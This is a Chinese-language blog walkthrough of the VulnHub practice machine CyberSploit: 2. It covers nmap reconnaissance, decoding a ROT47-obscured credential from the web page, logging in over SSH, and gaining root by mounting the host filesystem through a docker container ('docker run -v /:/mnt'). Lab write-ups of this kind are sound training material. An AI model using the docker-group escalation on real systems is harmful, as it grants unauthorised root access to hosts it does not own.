vulnhub靶机-CyberSploit: 2

最新推荐文章于 2024-07-18 16:41:57 发布

weixin_43784056

最新推荐文章于 2024-07-18 16:41:57 发布

阅读量819

点赞数

分类专栏： vulnhub靶机

本文链接：https://blog.csdn.net/weixin_43784056/article/details/107474582

版权

vulnhub靶机专栏收录该内容

40 篇文章 14 订阅

订阅专栏

1、找到靶机ip：192.168.0.131

nmap -sn 192.168.0.0/24

2、扫描靶机端口

root@kali:~# nmap -p- -A 192.168.0.130
Starting Nmap 7.80 ( https://nmap.org ) 
Nmap scan report for 192.168.0.130
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
MAC Address: 08:00:27:F1:D7:A0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.0.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.91 seconds

3、访问80端口，几个正常的用户名和密码中间夹杂着一个不正常的用户名和密码

拿去解密，猜可能是要移位，而且是要全部跟着移，使用rot47在线网站成功解密

D92:=6?5C2	4J36CDA=@:E`
shailendra	cybersploit1

4、ssh远程登录，用户名和密码：shailendra/cybersploit1，在家目录下发现提示文件：hint.txt，内容是docker，这老朋友了，果断id查看用户组，果然发现是docker组的，二话不说，先看看，本地有没有镜像，发现又没有，又得联网拉取镜像，然后和之前一样的操作了，成功提权，拿到flag

root@kali:~# ssh shailendra@192.168.0.131
shailendra@192.168.0.131's password: cybersploit1（不可见）
There were 3 failed login attempts since the last successful login.
Last login: Wed Jul 15 12:32:09 2020
[shailendra@localhost ~]$ ls
hint.txt
[shailendra@localhost ~]$ cat hint.txt 
docker
[shailendra@localhost ~]$ id
uid=1001(shailendra) gid=1001(shailendra) groups=1001(shailendra),991(docker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[shailendra@localhost ~]$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
[shailendra@localhost ~]$ docker pull alpine
Using default tag: latest
latest: Pulling from library/alpine
df20fa9351a1: Pull complete 
Digest: sha256:185518070891758909c9f839cf4ca393ee977ac378609f700f60a771a2dfe321
Status: Downloaded newer image for alpine:latest
docker.io/library/alpine:latest
[shailendra@bogon ~]$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
alpine              latest              a24bb4013296        7 weeks ago         5.57MB
[shailendra@bogon ~]$ docker run -v /:/mnt  -it alpine
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cd /mnt/root/
/mnt/root # ls
anaconda-ks.cfg  flag.txt         get-docker.sh    logs}
/mnt/root # cat flag.txt 
 __    ___   _      __    ___    __   _____  __  
/ /`  / / \ | |\ | / /`_ | |_)  / /\   | |  ( (` 
\_\_, \_\_/ |_| \| \_\_/ |_| \ /_/--\  |_|  _)_) 

 Pwned CyberSploit2 POC

share it with me twitter@cybersploit1

              Thanks ! 
/mnt/root #